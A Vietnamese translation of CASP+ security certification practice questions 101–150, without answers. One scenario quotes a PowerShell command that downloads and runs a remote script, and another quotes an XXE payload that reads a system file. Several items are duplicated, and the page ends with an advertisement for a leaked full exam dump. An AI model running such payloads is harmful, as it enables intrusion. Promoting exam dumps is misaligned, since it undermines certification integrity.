Câu hỏi 101: Đâu là rủi ro cụ thể trên đám mây QUAN TRỌNG NHẤT theo quan điểm của CSP?
A. Lỗi kiểm soát cô lập
B. Vi phạm tầng quản lý
C. Xóa dữ liệu không an toàn
D. Cạn kiệt tài nguyên

Câu hỏi 102: Một tổ chức đang phát triển kế hoạch khôi phục thảm họa yêu cầu dữ liệu phải được sao lưu và khả dụng ngay lập tức.
Tổ chức nên xem xét điều gì ĐẦU TIÊN để đáp ứng yêu cầu này?
A. Triển khai kế hoạch quản lý thay đổi để đảm bảo hệ thống đang sử dụng các phiên bản phù hợp.
B. Thuê thêm nhân viên trực để triển khai nếu sự kiện xảy ra.
C. Thiết kế một trang web ấm áp phù hợp để đảm bảo tính liên tục kinh doanh.
D. Xác định các quy trình kinh doanh quan trọng và xác định các yêu cầu về phần mềm và phần cứng liên quan.

Câu hỏi 103: Sử dụng các giải pháp mật mã để bảo vệ dữ liệu đang sử dụng đảm bảo dữ liệu được mã hóa:
A. khi nó được truyền qua mạng cục bộ.
B. trong bộ nhớ trong quá trình xử lý.
C. khi nó được ghi vào ổ cứng thể rắn của hệ thống.
D. bởi một mô-đun bảo mật phần cứng của doanh nghiệp.

Câu hỏi 104: Giám đốc thông tin (CIO) muốn triển khai một giải pháp đám mây đáp ứng các yêu cầu sau:
• Hỗ trợ tất cả các giai đoạn của SDLC.
• Sử dụng phần mềm cổng thông tin web được tùy chỉnh.
• Cho phép công ty xây dựng và sử dụng phần mềm cổng riêng của mình.
• Sử dụng nền tảng quản lý dữ liệu riêng của mình.
• Tiếp tục sử dụng các công cụ bảo mật dựa trên tác nhân.
CIO nên triển khai mô hình điện toán đám mây nào sau đây?
A. SaaS
B. PaaS
C. MaaS
D. IaaS

Câu hỏi 105: Nhà phân tích bảo mật đã phát hiện một cuộc tấn công PowerShell độc hại trên một máy chủ. Phần mềm độc hại đã sử dụng hàm Invoke-Expression để thực thi một tập lệnh độc hại bên ngoài. Nhà phân tích bảo mật đã quét đĩa bằng ứng dụng chống vi-rút và không tìm thấy bất kỳ IOC nào. Nhà phân tích bảo mật hiện cần triển khai giải pháp bảo vệ chống lại loại phần mềm độc hại này.
Điều nào sau đây mô tả TỐT NHẤT loại phần mềm độc hại mà giải pháp nên bảo vệ?
A. Worm
B. Bom logic
C. Không có tệp
D. Rootkit

Câu hỏi 106: Một nhóm phát triển đã tạo một ứng dụng di động liên hệ với API phụ trợ của công ty được lưu trữ trong môi trường PaaS. Các API đã gặp phải tình trạng sử dụng bộ xử lý cao do các hoạt động cạo. Kỹ sư bảo mật cần đề xuất một giải pháp sẽ ngăn chặn và khắc phục hành vi.
Điều nào sau đây sẽ bảo vệ TỐT NHẤT các API? (Chọn hai)
A. Bảo vệ Bot
B. OAuth 2.0
C. Xác thực đầu vào
D. Điểm cuối tự động mở rộng
E. Giới hạn tỷ lệ
F. Bảo vệ CSRF

Câu hỏi 107: Cơ sở hạ tầng hiện tại của một tổ chức bao gồm các VPN site-to-site giữa các trung tâm dữ liệu. Trong năm qua, một kẻ tấn công tinh vi đã khai thác lỗ hổng zero-day trên bộ tập trung VPN. Do đó, Giám đốc An ninh Thông tin (CISO) đang thực hiện các thay đổi về cơ sở hạ tầng để giảm thiểu rủi ro mất dịch vụ nếu một khai thác zero-day khác được sử dụng chống lại giải pháp VPN.
CISO nên sử dụng thiết kế nào sau đây là TỐT NHẤT?
A. Thêm một lớp bộ tập trung VPN của nhà cung cấp thay thế dự phòng thứ hai
B. Sử dụng mã hóa Base64 trong các kết nối VPN site-to-site hiện có
C. Phân phối các tài nguyên bảo mật trên các trang web VPN
D. Triển khai các dịch vụ IDS với mỗi bộ tập trung VPN
E. Chuyển sang kiến trúc dựa trên vùng chứa cho các dịch vụ dựa trên trang web

Câu hỏi 108: Một chính quyền địa phương đang điều tra khiếu nại về việc đánh cắp dữ liệu được yêu cầu xem xét dấu vân tay của các hành động của người dùng độc hại. Một điều tra viên đã chụp ảnh pháp y của VM và tải xuống hình ảnh xuống ổ USB được bảo mật để chia sẻ với chính phủ.
Điều nào sau đây cần được xem xét trong quá trình phát hành ổ đĩa cho chính phủ?
A. Mã hóa khi truyền tải
B. Vấn đề pháp lý
C. Chuỗi lưu giữ
D. Thứ tự biến động
E. Trao đổi khóa

Câu hỏi 109: Một nhà phân tích bảo mật nhận thấy số lượng cố gắng đăng nhập không thành công vào máy chủ thư bên ngoài ngày càng tăng. Trong quá trình điều tra một trong các hộp nhảy, nhà phân tích đã xác định được điều sau đây trong tệp nhật ký: powershell IEX (New-Object Net.WebClient) .DownloadString (‘https://content.comptia.org/casp/whois.psl’); whois
Kiểm soát bảo mật nào sau đây sẽ cảnh báo và ngăn chặn giai đoạn tiếp theo của cuộc tấn công?
A. Chống vi-rút và UEBA
B. Proxy ngược và hộp cát
C. EDR và danh sách ứng dụng được phê duyệt
D. Proxy chuyển tiếp và MFA

Câu hỏi 110: Là một phần trong chiến lược rủi ro của mình, một công ty đang xem xét việc mua bảo hiểm cho các sự cố an ninh mạng.
Điều nào sau đây mô tả TỐT NHẤT loại phản ứng rủi ro này?
A. Từ chối rủi ro
B. Giảm thiểu rủi ro
C. Chuyển giao rủi ro
D. Tránh rủi ro

Câu hỏi 111: Một nhóm DevOps đã triển khai cơ sở dữ liệu, dịch vụ hướng sự kiện và cổng API dưới dạng giải pháp PaaS sẽ hỗ trợ hệ thống thanh toán mới.
Nhóm DevOps sẽ cần thực hiện trách nhiệm bảo mật nào sau đây?
A. Định cấu hình một cách an toàn các cơ chế xác thực.
B. Vá lỗi cơ sở hạ tầng tại hệ điều hành.
C. Thực hiện quét cổng chống lại các dịch vụ.
D. Nâng cấp dịch vụ như một phần của quản lý vòng đời.

Câu hỏi 112: Giám đốc thông tin của công ty muốn triển khai phần mềm IDS vào kiến trúc hệ thống hiện tại để cung cấp thêm một lớp bảo mật. Phần mềm phải có khả năng giám sát hoạt động của hệ thống, cung cấp thông tin về các cuộc tấn công đã cố gắng và cung cấp phân tích các hoạt động độc hại để xác định các quy trình hoặc người dùng liên quan.
Điều nào sau đây sẽ cung cấp thông tin này?
A. HIPS
B. UEBA
C. HIDS
D. NIDS

Câu hỏi 113: Giám đốc An ninh Thông tin của một công ty khởi nghiệp đã yêu cầu một kỹ sư bảo mật triển khai chương trình bảo mật phần mềm trong một môi trường trước đây ít được giám sát.
Phương pháp thử nghiệm nào sau đây là TỐT NHẤT cho kỹ sư sử dụng trong tình huống này?
A. Phân tích thành phần phần mềm
B. Làm xáo trộn mã
C. Phân tích tĩnh
D. Phân tích động

Câu hỏi 114: Điều tra viên pháp y sẽ sử dụng lệnh foremost cho:
A. nhân bản đĩa.
B. phân tích các gói đã chụp trên mạng.
C. khôi phục các tệp bị mất.
D. trích xuất các tính năng như địa chỉ email.

Câu hỏi 115: Một công ty phần mềm đang phát triển một ứng dụng trong đó dữ liệu phải được mã hóa bằng mật mã yêu cầu như sau:
• Vectơ khởi tạo
• Độ trễ thấp
• Phù hợp cho phát trực tuyến
Công ty nên sử dụng mật mã nào sau đây?
A. Phản hồi mật mã
B. Mã xác thực tin nhắn chuỗi khối mật mã
C. Chuỗi khối mật mã
D. Sổ mã điện tử

Câu hỏi 116: Một tổ chức cung cấp giải pháp SaaS gần đây đã gặp sự cố liên quan đến mất dữ liệu khách hàng. Hệ thống có một mức độ tự phục hồi bao gồm giám sát hiệu suất và tài nguyên khả dụng. Khi hệ thống phát hiện sự cố, quy trình tự phục hồi được cho là sẽ khởi động lại các phần của phần mềm.
Trong sự cố, khi hệ thống tự phục hồi cố gắng khởi động lại các dịch vụ, dung lượng đĩa khả dụng trên ổ dữ liệu để khởi động lại tất cả các dịch vụ là không đủ. Hệ thống tự phục hồi không phát hiện ra rằng một số dịch vụ không khởi động lại hoàn toàn và tuyên bố hệ thống đã hoạt động hoàn toàn.
Điều nào sau đây mô tả TỐT NHẤT lý do tại sao lỗi im lặng xảy ra?
A. Nhật ký hệ thống đã được xoay vòng sớm.
B. Báo động sử dụng đĩa cao hơn mức yêu cầu khởi động lại dịch vụ.
C. Số lượng nút trong cụm tự phục hồi là tốt.
D. Các kiểm tra có điều kiện trước khi khởi động lại dịch vụ đã thành công.

Câu hỏi 117: Một chuyên gia tư vấn bảo mật cần thiết lập bảo mật không dây cho một văn phòng nhỏ không có Active Directory. Mặc dù thiếu quản lý tài khoản tập trung, quản lý văn phòng muốn đảm bảo mức độ phòng thủ cao để ngăn chặn các cuộc tấn công brute-force chống lại xác thực không dây.
Công nghệ nào sau đây sẽ đáp ứng TỐT NHẤT nhu cầu này?
A. Lồng Faraday
B. WPA2 PSK
C. WPA3 SAE
D. WEP 128 bit

Câu hỏi 118: Một nhóm tấn công đã thực hiện kiểm tra thâm nhập trên hệ thống thẻ thông minh mới. Nhóm đã chứng minh rằng bằng cách đặt thẻ thông minh ở nhiệt độ cao, khóa bí mật có thể bị lộ.
Nhóm đã sử dụng cuộc tấn công kênh phụ nào sau đây?
A. Phân tích công suất sai khác
B. Phân tích lỗi sai khác
C. Phân tích nhiệt độ sai khác
D. Phân tích thời gian sai khác

Câu hỏi 119: Yêu cầu tuân thủ bảo mật quy định rằng các môi trường cụ thể xử lý dữ liệu nhạy cảm phải được bảo vệ bằng các hạn chế cần biết và chỉ có thể kết nối với các điểm cuối được ủy quyền. Yêu cầu cũng nêu rõ rằng phải sử dụng giải pháp DLP trong môi trường để kiểm soát dữ liệu rời khỏi môi trường.
Điều nào sau đây nên được triển khai cho người dùng đặc quyền để họ có thể hỗ trợ môi trường từ máy trạm của mình trong khi vẫn tuân thủ?
A. NAC để kiểm soát các điểm cuối được ủy quyền
B. FIM trên các máy chủ lưu trữ dữ liệu
C. Hộp nhảy trong mạng con được sàng lọc
D. Giải pháp VPN chung cho mạng chính

Câu hỏi 120: Một nhóm mạng được yêu cầu cung cấp quyền truy cập từ xa an toàn cho tất cả nhân viên của công ty. Nhóm quyết định sử dụng VPN client-to-site làm giải pháp. Trong cuộc thảo luận, Giám đốc An ninh Thông tin đã nêu lên mối quan ngại về bảo mật và yêu cầu nhóm mạng định tuyến lưu lượng truy cập Internet của người dùng từ xa thông qua cơ sở hạ tầng văn phòng chính. Làm như vậy sẽ ngăn người dùng từ xa truy cập Internet thông qua mạng cục bộ của họ trong khi được kết nối với VPN.
Giải pháp nào sau đây mô tả điều này?
A. Đào hầm đầy đủ
B. Định tuyến không đối xứng
C. Đào hầm SSH
D. Đào hầm chia nhỏ

Câu hỏi 121: Một nhà phân tích bảo mật phát hiện ra rằng WAF của công ty không được cấu hình đúng cách. Máy chủ web chính đã bị xâm nhập và tải trọng sau được tìm thấy trong một trong các yêu cầu độc hại:

      <!DOCTYPE doc [
<!ELEMENT doc ANY>
<!ENTITY xxe SYSTEM "file:///etc/password">]>
<doc>&xxe;</doc>
    

Use code with caution.Xml

Điều nào sau đây sẽ giảm thiểu TỐT NHẤT lỗ hổng này?
A. CAPTCHA
B. Xác thực đầu vào
C. Mã hóa dữ liệu
D. Phòng chống xâm nhập mạng

Câu hỏi 122: Một chuyên gia tư vấn bảo mật cần bảo vệ mạng lưới rơle điện được sử dụng để giám sát và điều khiển năng lượng được sử dụng trong một cơ sở sản xuất.
Chuyên gia tư vấn nên xem xét hệ thống nào sau đây trước khi đưa ra khuyến nghị?
A. CAN
B. ASIC
C. FPGA
D. SCADA

Câu hỏi 123: Một lỗ hổng nghiêm trọng đã được tìm thấy trên một ứng dụng web và được đưa vào doanh nghiệp. Lỗ hổng có thể cho phép người dùng trái phép sử dụng thư viện mã nguồn mở để xem thông tin người dùng có đặc quyền. Doanh nghiệp không muốn chấp nhận rủi ro, nhưng các nhà phát triển không thể khắc phục sự cố ngay lập tức.
Điều nào sau đây nên được thực hiện để giảm rủi ro xuống mức có thể chấp nhận được cho đến khi sự cố có thể được khắc phục?
A. Quét mã bằng trình phân tích mã tĩnh, thay đổi mật khẩu người dùng có đặc quyền và cung cấp đào tạo bảo mật.
B. Thay đổi tên người dùng có đặc quyền, xem lại nhật ký hệ điều hành và triển khai mã thông báo phần cứng.
C. Triển khai MFA, xem lại nhật ký ứng dụng và triển khai WAF.
D. Triển khai VPN, định cấu hình kho lưu trữ thư viện mã nguồn mở chính thức và thực hiện đánh giá đầy đủ ứng dụng để tìm lỗ hổng.

Câu hỏi 124: Một kỹ thuật viên đang xem xét nhật ký và nhận thấy một số lượng lớn tệp đã được chuyển đến các trang web từ xa trong khoảng thời gian ba tháng. Hoạt động này sau đó đã dừng lại.
Các tệp đã được chuyển qua các phiên HTTP được bảo vệ bằng TLS từ các hệ thống không gửi lưu lượng truy cập đến các trang web đó.
Kỹ thuật viên sẽ xác định mối đe dọa này là:
A. một cuộc tấn công giải mã RSA bằng cách sử dụng mã hóa lỗi thời và yếu.
B. một cuộc tấn công zero-day.
C. một mối đe dọa dai dẳng nâng cao.
D. một cuộc tấn công trên đường dẫn.

Câu hỏi 125: Một kỹ sư bảo mật cho rằng nhóm phát triển đã mã hóa cứng các biến môi trường nhạy cảm trong mã của mình.
Điều nào sau đây sẽ bảo mật TỐT NHẤT quy trình CI/CD của công ty?
A. Sử dụng trình quản lý bí mật đáng tin cậy
B. Thực hiện DAST hàng tuần
C. Giới thiệu việc sử dụng điều phối vùng chứa
D. Triển khai gắn thẻ phiên bản

Câu hỏi 126: Một công ty nhỏ gần đây đã phát triển công nghệ nguyên mẫu cho một chương trình quân sự. Kỹ sư bảo mật của công ty lo ngại về nguy cơ bị đánh cắp thông tin độc quyền mới được phát triển.
Kỹ sư bảo mật nên làm gì để quản lý TỐT NHẤT các mối đe dọa một cách chủ động?
A. Tham gia cộng đồng chia sẻ thông tin có liên quan đến công ty.
B. Tận dụng khung MITRE ATT&CK để lập bản đồ TTP.
C. Sử dụng các kỹ thuật OSINT để đánh giá và phân tích các mối đe dọa.
D. Cập nhật đào tạo nâng cao nhận thức bảo mật để giải quyết các mối đe dọa mới, chẳng hạn như các phương pháp hay nhất về bảo mật dữ liệu.

Câu hỏi 127: Một kỹ sư bảo mật được yêu cầu đóng tất cả các kết nối không an toàn từ mạng công ty. Kỹ sư đang cố gắng hiểu tại sao UTM của công ty không cho phép người dùng tải xuống email qua IMAPS. Kỹ sư đưa ra một giả thuyết và bắt đầu thử nghiệm bằng cách tạo ID tường lửa 58 và người dùng có thể tải xuống email chính xác bằng cách sử dụng IMAP. Mạng bao gồm ba VLAN:

  • VLAN 30: Mạng khách
  • VLAN 20: Mạng người dùng công ty
  • VLAN 110: Mạng máy chủ công ty
    Kỹ sư bảo mật xem xét các quy tắc tường lửa UTM và tìm thấy những điều sau:
    | Active | ID | Source | Destination | Ports | Action | TLS Decryption |
    |—|—|—|—|—|—|—|
    | Yes | 58 | VLAN 20 | 15.22.33.45 | 143 | Allow and log | Enabled |
    | Yes | 33 | VLAN 30 | Any | 80, 443 | Allow and log | Disabled |
    | Yes | 22 | VLAN 110 | VLAN 20 | Any | Allow and log | Disabled |
    | No | 21 | VLAN 20 | 15.22.33.45 | 990 | Allow and log | Disabled |
    | Yes | 20 | VLAN 20 | VLAN 110 | Any | Allow and log | Enabled |
    | Yes | 19 | VLAN 20 | Any | 993, 587 | Allow and log | Enabled |

Kỹ sư bảo mật nên làm gì để đảm bảo IMAPS hoạt động bình thường trên mạng người dùng công ty?
A. Liên hệ với nhà cung cấp dịch vụ email và hỏi xem IP của công ty có bị chặn không.
B. Xác nhận chứng chỉ máy chủ email được cài đặt trên máy tính của công ty.
C. Đảm bảo chứng chỉ UTM được nhập trên máy tính của công ty.
D. Tạo quy tắc tường lửa IMAPS để đảm bảo email được phép.

Câu hỏi 128: Một nhà phân tích bảo mật đang xem xét kết nối mạng trên máy trạm Linux và kiểm tra các kết nối TCP đang hoạt động bằng dòng lệnh.
Lệnh nào sau đây là TỐT NHẤT để chạy để chỉ xem các kết nối Internet đang hoạt động?
A. sudo netstat -antu | grep ‘LISTEN’ | awk ‘{print $5}’
B. sudo netstat -nlt -p | grep ‘ESTABLISHED’
C. sudo netstat -plntu | grep -v ‘Foreign Address’
D. sudo netstat -pnut -w | column -t -s $’\w’
E. sudo netstat -pnut | grep -P ^tcp

Câu hỏi 129: Một công ty vận chuyển đang cố gắng loại bỏ toàn bộ các loại mối đe dọa đang phát triển chính sách SELinux để đảm bảo các thiết bị Android tùy chỉnh của mình được sử dụng riêng cho việc theo dõi gói hàng.
Sau khi biên dịch và triển khai chính sách, công ty phải đảm bảo các thiết bị được cấu hình để chạy ở chế độ nào sau đây?
A. Bảo vệ
B. Cho phép
C. Thực thi
D. Bắt buộc

Câu hỏi 130: Một nhà phân tích bảo mật nhận được cảnh báo từ SIEM về hoạt động bất thường trên máy chủ nhảy SSH công cộng được ủy quyền. Để điều tra thêm, nhà phân tích lấy nhật ký sự kiện trực tiếp từ /var/log/auth.log: graphic.ssh_auth_log.
Hành động nào sau đây sẽ giải quyết TỐT NHẤT các rủi ro tiềm ẩn do hoạt động trong nhật ký gây ra?
A. Thay đổi mật khẩu tài khoản dịch vụ được cấu hình sai
B. Sửa đổi chỉ thị cấu hình AllowUsers
C. Hạn chế quyền truy cập cổng 22 bên ngoài
D. Triển khai tùy chọn khóa máy chủ

Câu hỏi 131: Một nhóm khôi phục thảm họa đã biết về một số sai lầm được thực hiện trong bài kiểm tra song song khôi phục thảm họa gần đây nhất. Tài nguyên tính toán đã cạn kiệt ở mức 70% khôi phục các dịch vụ quan trọng. Nên sửa đổi điều nào sau đây để ngăn chặn sự cố tái diễn?
A. Mục tiêu điểm khôi phục
B. Mục tiêu thời gian khôi phục
C. Các chức năng thiết yếu
D. Mức dịch vụ khôi phục

Câu hỏi 132: Một kỹ thuật viên đang xem xét nhật ký và nhận thấy một số lượng lớn tệp đã được chuyển đến các trang web từ xa trong ba tháng. Hoạt động này sau đó đã dừng lại.
Các tệp được chuyển qua các phiên HTTP được bảo vệ TLS từ các hệ thống không gửi lưu lượng đến các trang web đó.
Kỹ thuật viên sẽ xác định mối đe dọa này là:
A. một cuộc tấn công giải mã RSA bằng cách sử dụng mã hóa lỗi thời và yếu.
B. một cuộc tấn công zero-day.
C. một mối đe dọa dai dẳng nâng cao.
D. một cuộc tấn công trên đường dẫn.

Câu hỏi 133: Một kỹ sư bảo mật cho rằng nhóm phát triển đã mã hóa cứng các biến môi trường nhạy cảm vào mã.
Cái nào sau đây sẽ bảo mật TỐT NHẤT đường dẫn CI/CD của công ty?
A. Sử dụng trình quản lý bí mật đáng tin cậy.
B. Thực hiện DAST hàng tuần.
C. Giới thiệu việc sử dụng dàn nhạc container.
D. Triển khai gắn thẻ phiên bản.

Câu hỏi 134: Một công ty nhỏ gần đây đã phát triển công nghệ nguyên mẫu cho chương trình quân sự. Kỹ sư bảo mật của công ty lo ngại về khả năng bị đánh cắp thông tin độc quyền mới được phát triển. Kỹ sư bảo mật nên làm điều nào sau đây TỐT NHẤT để quản lý các mối đe dọa một cách chủ động?
A. Tham gia một cộng đồng chia sẻ thông tin có liên quan đến công ty.
B. Tận dụng khung MITRE ATT&CK để ánh xạ TTP.
C. Sử dụng các kỹ thuật OSINT để đánh giá và phân tích các mối đe dọa.
D. Cập nhật đào tạo nâng cao nhận thức bảo mật để giải quyết các mối đe dọa mới, chẳng hạn như các phương pháp hay nhất về bảo mật dữ liệu.

Câu hỏi 135: Giám đốc an ninh thông tin của một công ty lo ngại rằng việc chuyển sang đám mây được đề xuất của công ty có thể dẫn đến việc thiếu khả năng hiển thị vào nhật ký luồng lưu lượng mạng trong VPC. Kiểm soát bù trừ nào sau đây là TỐT NHẤT để thực hiện trong tình huống này?
A. EDR
B. SIEM
C. HIDS
D. UEBA

Câu hỏi 136: Một nhóm bảo mật đã nhận được thông báo pháp lý yêu cầu cung cấp thông tin liên quan đến thông đồng và định giá từ các nhân viên không còn làm việc với tổ chức.
Bộ phận pháp lý đã cung cấp cho nhóm bảo mật danh sách các thuật ngữ tìm kiếm để điều tra.
Đây là một ví dụ về:
A. thẩm định.
B. khám phá điện tử.
C. sự chăm sóc chu đáo.
D. giữ pháp lý.

Câu hỏi 137: Giao thức nào sau đây là giao thức năng lượng thấp, tốc độ dữ liệu thấp cho phép tạo ra mạng PAN?
A. Zigbee
B. CAN
C. DNP3
D. Modbus

Câu hỏi 138: Đánh giá của một tổ chức về nhà cung cấp không quan trọng của bên thứ ba cho thấy nhà cung cấp không có bảo hiểm an ninh mạng và tỷ lệ luân chuyển nhân viên CNTT cao. Tổ chức sử dụng nhà cung cấp để di chuyển thiết bị văn phòng của khách hàng từ một địa điểm dịch vụ này sang địa điểm dịch vụ khác. Nhà cung cấp có được dữ liệu khách hàng và quyền truy cập vào doanh nghiệp thông qua API.
Với thông tin này, rủi ro nào sau đây được ghi nhận?
A. Trì hoãn tính năng do chu kỳ phát triển phần mềm kéo dài
B. Trách nhiệm pháp lý tài chính từ vi phạm dữ liệu của nhà cung cấp
C. Tác động kỹ thuật đến cấu hình API
D. Khả năng doanh nghiệp của nhà cung cấp ngừng hoạt động

Câu hỏi 139: Một công ty muốn định lượng và truyền đạt hiệu quả của các biện pháp kiểm soát bảo mật của mình nhưng phải thiết lập các biện pháp. Điều nào sau đây CÓ KHẢ NĂNG NHẤT được đưa vào lộ trình đánh giá hiệu quả cho các biện pháp kiểm soát này?
A. Tạo quy trình quản lý thay đổi.
B. Thiết lập các chỉ số hiệu suất chính.
C. Tạo lịch trình tổng thể tích hợp.
D. Xây dựng kế hoạch truyền thông.
E. Thực hiện đánh giá kiểm soát bảo mật.

Câu hỏi 140: Một ngân hàng đang làm việc với một kiến trúc sư bảo mật để tìm giải pháp TỐT NHẤT để phát hiện các thỏa hiệp hệ thống quản lý cơ sở dữ liệu. Giải pháp phải đáp ứng các yêu cầu sau:
• Hoạt động ở tầng ứng dụng
• Gửi cảnh báo về các cuộc tấn công từ cả người dùng có đặc quyền và người dùng độc hại
• Có tỷ lệ dương tính giả rất thấp
Kiến trúc sư nên đề xuất điều nào sau đây?
A. FIM
B. WAF
C. NIPS
D. DAM
E. UTM

Câu hỏi 141: Một doanh nghiệp muốn di chuyển khối lượng công việc của mình từ cơ sở hạ tầng CNTT tại chỗ sang đám mây nhưng không thể triển khai tất cả các biện pháp kiểm soát cần thiết. Điều nào sau đây mô tả TỐT NHẤT rủi ro liên quan đến việc triển khai này?
A. Mất quản trị
B. Khóa nhà cung cấp
C. Rủi ro tuân thủ
D. Khóa nhà cung cấp

Câu hỏi 142: Một kiến trúc sư bảo mật cần triển khai giải pháp CASB cho một tổ chức có lực lượng lao động từ xa phân tán cao. Một trong những yêu cầu đối với việc triển khai bao gồm khả năng khám phá các ứng dụng SaaS và chặn quyền truy cập vào những ứng dụng không được phê duyệt hoặc được xác định là rủi ro. Điều nào sau đây sẽ đạt được mục tiêu này TỐT NHẤT?
A. Triển khai các tác nhân điểm cuối giám sát lưu lượng web cục bộ để thực thi DLP và chính sách mã hóa.
B. Triển khai cơ sở hạ tầng đám mây để proxy tất cả lưu lượng web của người dùng để thực thi DLP và chính sách mã hóa.
C. Triển khai cơ sở hạ tầng đám mây để proxy tất cả lưu lượng web của người dùng và kiểm soát quyền truy cập theo chính sách tập trung.
D. Triển khai các tác nhân điểm cuối giám sát lưu lượng web cục bộ và kiểm soát quyền truy cập theo chính sách tập trung.

Câu hỏi 143: Trong một bài tập lừa đảo, một số ít người dùng có đặc quyền được xếp hạng cao trong danh sách thất bại. Doanh nghiệp muốn đảm bảo rằng người dùng có đặc quyền có thêm biện pháp kiểm soát giám sát bảo mật. Giải pháp nào sau đây CÓ KHẢ NĂNG NHẤT?
A. WAF để bảo vệ lưu lượng web
B. Phân tích hành vi người dùng và thực thể
C. Yêu cầu thay đổi mật khẩu cục bộ
D. Phân tích khoảng cách

Câu hỏi 144: Một nhà phân tích đang đánh giá bảo mật của một ứng dụng web không chứa dữ liệu nhạy cảm hoặc tài chính. Ứng dụng yêu cầu người dùng có mật khẩu tối thiểu 12 ký tự. Một trong các ký tự phải được viết hoa và một ký tự phải là số. Để đặt lại mật khẩu, người dùng được yêu cầu cung cấp nơi sinh, ngày sinh và tên thời con gái của mẹ. Khi tất cả những điều này được nhập chính xác, mật khẩu mới sẽ được gửi qua email cho người dùng. Điều nào sau đây đáng lo ngại NHẤT đối với nhà phân tích?
A. Câu trả lời bảo mật có thể được xác định thông qua trinh sát trực tuyến.
B. Mật khẩu quá dài, điều này có thể khuyến khích người dùng ghi mật khẩu ra giấy.
C. Mật khẩu nên bao gồm một ký tự đặc biệt.
D. Độ dài mật khẩu tối thiểu quá ngắn.

Câu hỏi 145: Trong môi trường đám mây, nhà cung cấp giảm bớt gánh nặng cho các nhóm của tổ chức bằng cách chia sẻ nhiều nhiệm vụ vận hành. Trong mô hình trách nhiệm được chia sẻ, trách nhiệm nào sau đây thuộc về nhà cung cấp trong triển khai PaaS?
A. Tài sản dữ liệu dành riêng cho ứng dụng
B. Quản lý quyền truy cập người dùng ứng dụng
C. Logic và mã dành riêng cho ứng dụng
D. Phần mềm ứng dụng/nền tảng

Câu hỏi 146: Đây là câu hỏi dạng mô phỏng, không thể dịch đầy đủ do thiếu ngữ cảnh.

Câu hỏi 147: Một nhà phân tích nhận được danh sách IOC từ một cơ quan chính phủ. Cuộc tấn công có các đặc điểm sau:

  1. Cuộc tấn công bắt đầu bằng lừa đảo hàng loạt.
  2. Nếu người dùng nhấp vào liên kết, một trình thả xuống sẽ được tải xuống máy tính.
  3. Mỗi mẫu phần mềm độc hại đều có băm duy nhất được liên kết với người dùng.
    Nhà phân tích cần xác định xem các biện pháp kiểm soát điểm cuối hiện có có hiệu quả hay không. Nhà phân tích nên sử dụng kỹ thuật giảm thiểu rủi ro nào sau đây?
    A. Cập nhật kế hoạch ứng phó sự cố.
    B. Chặn tệp thực thi.
    C. Triển khai một honeypot trên máy tính xách tay.
    D. Kích nổ trong hộp cát.

Câu hỏi 148: Hệ thống tài chính của một tổ chức gần đây đã bị tấn công. Một nhà phân tích pháp y đang xem xét nội dung của các tệp bị xâm nhập để tìm dữ liệu thẻ tín dụng. Nhà phân tích nên chạy lệnh nào sau đây để xác định TỐT NHẤT xem dữ liệu tài chính có bị mất hay không?
A. grep ‘3}[0-9]{12}[0-9]{4}^’ file
B. grep ‘^4[0-9]{12}([0-9]{3})?$’ file
C. grep ‘^6(?:011|5[1-9][0-9]{2}|[2-9][0-9]{3})([0-9]{12,15})?$’ file
D. grep -v ‘^6(?:011|5[1-9][0-9]{2}|[2-9][0-9]{3})([0-9]{12,15})?$’ file

Câu hỏi 149: Một tổ chức yêu cầu một tài liệu hợp đồng bao gồm:
• Tổng quan về những gì được đề cập
• Mục tiêu và mục đích
• Chỉ số hiệu suất cho mỗi bên
• Đánh giá cách thức thỏa thuận được quản lý bởi tất cả các bên
Điều nào sau đây mô tả TỐT NHẤT loại tài liệu hợp đồng này?
A. SLA
B. BAA
C. NDA
D. ISA

Câu hỏi 150: Một công ty có trụ sở tại Hoa Kỳ lưu giữ chi tiết bảo hiểm của công dân EU. Điều nào sau đây phải được tuân thủ khi xử lý dữ liệu cá nhân, riêng tư và bí mật của công dân EU?
A. Nguyên tắc xử lý hợp pháp, công bằng và minh bạch
B. Quyền được quên – nguyên tắc của các yêu cầu xóa dữ liệu cá nhân
C. Nguyên tắc không thể chối cãi và từ chối
D. Nguyên tắc mã hóa, làm xáo trộn và che dữ liệu

Lưu ý , bài thi bằng tiếng ANH, hiện nay các bài thi bằng tiếng Việt không còn xuất hiện trên OnVue. Tuy nhiên việc ôn tập các câu hỏi tình huống bằng tiếng Việt sẽ giúp cho các bạn vững vàng hơn.

Full Dump CASP (CAS-004) / CompTIA SecurityX 649 Q/A (bản tiếng Anh) Liên hệ Zalo Proctor 0914433338 (hãy kiểm tra số lượng câu hỏi trên trang gốc ExamTopics.Com để biết chính xác số câu và cả chi phí).

Trending